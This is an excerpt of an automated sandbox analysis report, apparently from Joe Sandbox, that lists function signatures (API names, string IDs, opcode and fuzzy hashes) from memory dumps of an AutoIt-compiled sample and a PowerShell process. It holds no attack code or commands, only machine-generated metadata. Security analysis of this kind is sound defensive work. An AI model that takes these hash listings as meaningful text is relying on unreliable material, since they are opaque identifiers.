                                                                                          Similarity
                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                          • String ID: Combobox
                                                                                          • API String ID: 1025951953-2096851135
                                                                                          • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                          • Instruction ID: 05b89485fc8c316fb5e23d26e562cad0db49546d97a878f3470c58a787987f47
                                                                                          • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                          • Instruction Fuzzy Hash: E131063260C781CAE770AF25B454B5AB7A1F789790F504239EAE903BA9DB39D845CF10
                                                                                          Function 00007FF74D0D9BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                          • String ID: edit
                                                                                          • API String ID: 2978978980-2167791130
                                                                                          • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                          • Instruction ID: 362a584ae168d165fe02744450823ecb05b83aeface3b1e39433b7c7dfb8e819
                                                                                          • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                          • Instruction Fuzzy Hash: 0D313836A0CB81CAE770EB15E45475AB7A1F789790F544235EAA843BA8DB3CD881CB11
                                                                                          Function 00007FF74D06FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _handle_error
                                                                                          • String ID: "$pow
                                                                                          • API String ID: 1757819995-713443511
                                                                                          • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                          • Instruction ID: eb95f8100563779c33e7b2c9ffcba3cccab5693358cc6676c0f75d15f33e2f0a
                                                                                          • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                          • Instruction Fuzzy Hash: 15215E72E1CA85C7D370EF50E04066AFEA1FBDA344F602326F6C906965EBBDD1819B10
                                                                                          Function 00007FF74D09DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 3678867486-1403004172
                                                                                          • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                          • Instruction ID: 81034865b669948586bf3dab6e20e8acf0b203b4c3f79bed9dc9558a04f11058
                                                                                          • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                          • Instruction Fuzzy Hash: 7411D272A1D781C2E610FB11D1441ADA3A1FB99BA0F844231DAEC477EAEE7CD506CB60
                                                                                          Function 00007FF74D0BE708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$OpenOption
                                                                                          • String ID: <local>
                                                                                          • API String ID: 942729171-4266983199
                                                                                          • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                          • Instruction ID: 4e07315946b182f09cfe03e465d8477690606ff4f6dcad336572c8fa0ac00ab3
                                                                                          • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                          • Instruction Fuzzy Hash: D411B636A1C641C2E751AB51E0047BDA361E781B48FE44035DBC90BAA8EF3DD882CB10
                                                                                          Function 00007FF74D09DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 3678867486-1403004172
                                                                                          • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                          • Instruction ID: d8c224b0099ebb8fc83053f2e1375dc71e4fb833d8926abf8add97710d6960cc
                                                                                          • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                          • Instruction Fuzzy Hash: F3119022E1D686D2EA10B710E1512FDA351BF95780F844130DACD07AAAEE6CD605CB20
                                                                                          Function 00007FF74D09DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 3678867486-1403004172
                                                                                          • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                          • Instruction ID: 174e6b8999fa1d3ff6f0ed3b6b9d35b6006986c9058f827b434756e8c93693c3
                                                                                          • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                          • Instruction Fuzzy Hash: 31118162A1D681D2EA10BB10E1511EDA361FB99784FC44131DACD07AA9EE6CD605CB20
                                                                                          Function 00007FF74D0DFEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3712363035-3916222277
                                                                                          • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                          • Instruction ID: 0d0230119a3f807b5ebbbe14722fe1ff23fe5a0c1ab1bc3b4a3137f70481be5a
                                                                                          • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                          • Instruction Fuzzy Hash: 4A114F31A0CA42C6EB10FF52F90465AF6A1FB84780F854139DE8947A64EF3DD050CB24
                                                                                          Function 00007FF74D09DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 3678867486-1403004172
                                                                                          • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                          • Instruction ID: ecfa4ae48aa3f01cff2fe905037c93b332ade719fbce659a85fe046b5fa25051
                                                                                          • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                          • Instruction Fuzzy Hash: 24016521A5C586D2EA20F714E1A11BD9361EF95384FD04231E9DD07AAEFE6CD609CB20
                                                                                          Function 00007FF74D0715B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                          • String ID: !$tan
                                                                                          • API String ID: 3384550415-2428968949
                                                                                          • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                          • Instruction ID: 54200abe7d3ff87ada2443cc0bfaca4e4fb7b2a394f774a28d73e724c9ec7aea
                                                                                          • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                          • Instruction Fuzzy Hash: CA018471A2CB85C1DA14EF12A44037AA6A2BFDA7D4F505335EA9E0BB94EF7DD1508B00
                                                                                          Function 00007FF74D0714E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                          • String ID: !$cos
                                                                                          • API String ID: 3384550415-1949035351
                                                                                          • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                          • Instruction ID: 3eba9b8f6767674c25d4ef16e01161cba77bffdde98d393e0d326aed419d95b7
                                                                                          • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                          • Instruction Fuzzy Hash: D5019271A2CB89C1D614EE22944037AA6A2BF9A7D4F505325E99E0BBD4EB6DD0505B00
                                                                                          Function 00007FF74D0714FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                          • String ID: !$sin
                                                                                          • API String ID: 3384550415-1565623160
                                                                                          • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                          • Instruction ID: 3ea1e9a092c4c4410a315a77976319243e6a0a71f9e226a70bbc20482739cae8
                                                                                          • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                          • Instruction Fuzzy Hash: E5019272A2CB85C1D614EF22944037AA6A2BF9A7D4F505325E99E0BBD4EF6DD0404B00
                                                                                          Function 00007FF74D071370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _handle_error
                                                                                          • String ID: "$exp
                                                                                          • API String ID: 1757819995-2878093337
                                                                                          • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                          • Instruction ID: aaa0ef404df365a3d6ef5782ab4eebe95ae3990475e281eea70393efe0e2f457
                                                                                          • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                          • Instruction Fuzzy Hash: 8801A976A2CA88C2E220DF24D4452AAB6B0FFDA344F601315E7841A670D77DD4819B00
                                                                                          Function 00007FF74D09C59C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                          • API String ID: 2030045667-4017498283
                                                                                          • Opcode ID: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                                          • Instruction ID: fcd5f6e5737f459ea174345dc4ea05dc9a27957370ffd73d6c90f3f7310d659f
                                                                                          • Opcode Fuzzy Hash: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                                          • Instruction Fuzzy Hash: A9F0A020B1C64AC2EB18B355B1553B9A252AF88780FD45431D98D47BAAEDACD4818760
                                                                                          Function 00007FF74D0575C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • try_get_function.LIBVCRUNTIME ref: 00007FF74D0575E9
                                                                                          • TlsSetValue.KERNEL32(?,?,?,00007FF74D057241,?,?,?,?,00007FF74D05660C,?,?,?,?,00007FF74D054CD3), ref: 00007FF74D057600
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Valuetry_get_function
                                                                                          • String ID: FlsSetValue
                                                                                          • API String ID: 738293619-3750699315
                                                                                          • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                          • Instruction ID: 5f41145a7bbe273ce37ede95a3b9e8487e516015145ccc7392df46cd0e21fb8d
                                                                                          • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                          • Instruction Fuzzy Hash: 4EE06D62A0C646C1EB09BB55F4144F8A361AF8CB91FD94036DA9D073B5EE7CE988C760
                                                                                          Function 00007FF74D055620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF74D055629
                                                                                          • _CxxThrowException.LIBVCRUNTIME ref: 00007FF74D05563A
                                                                                            • Part of subcall function 00007FF74D057018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D05563F), ref: 00007FF74D05708D
                                                                                            • Part of subcall function 00007FF74D057018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D05563F), ref: 00007FF74D0570BF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                          • String ID: Unknown exception
                                                                                          • API String ID: 3561508498-410509341
                                                                                          • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                          • Instruction ID: 51af5b1954191b594d97ac6f2a3a200a4c994ee524dfbeee6d2a2c93cd239f09
                                                                                          • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                          • Instruction Fuzzy Hash: 55D05B22A1C546D1DE10FB04D854398E330F784304FD04431D58D435B1FF2CD64AD710

                                                                                          Executed Functions

                                                                                          Function 00007FFAAB1B099E Relevance: .2, Instructions: 222COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2036069237.00007FFAAB1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab1b0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8b0619e9a079aab073799a85a947dca4c13f944a315a8e6f85ee7f30824b9e39
                                                                                          • Instruction ID: 7a5d5da26b7c97cb42ea476932a989d9474e2b9cf1289cb643b5d475e5577ce2
                                                                                          • Opcode Fuzzy Hash: 8b0619e9a079aab073799a85a947dca4c13f944a315a8e6f85ee7f30824b9e39
                                                                                          • Instruction Fuzzy Hash: 05611E53A1FE86CFF79A977C48552B5A6C2EF8629475885BED04EC31E3DD08DC098381
                                                                                          Function 00007FFAAB1B09EA Relevance: .1, Instructions: 140COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2036069237.00007FFAAB1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab1b0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ef0d64c0fbf99c53e99af85bb11acf84c98cb3d18776ae2a7e919b44d35b1982
                                                                                          • Instruction ID: 7ed6ce1d6019c790b4a5f4a5a09309e132d77573a7352cae2299690a4062466d
                                                                                          • Opcode Fuzzy Hash: ef0d64c0fbf99c53e99af85bb11acf84c98cb3d18776ae2a7e919b44d35b1982
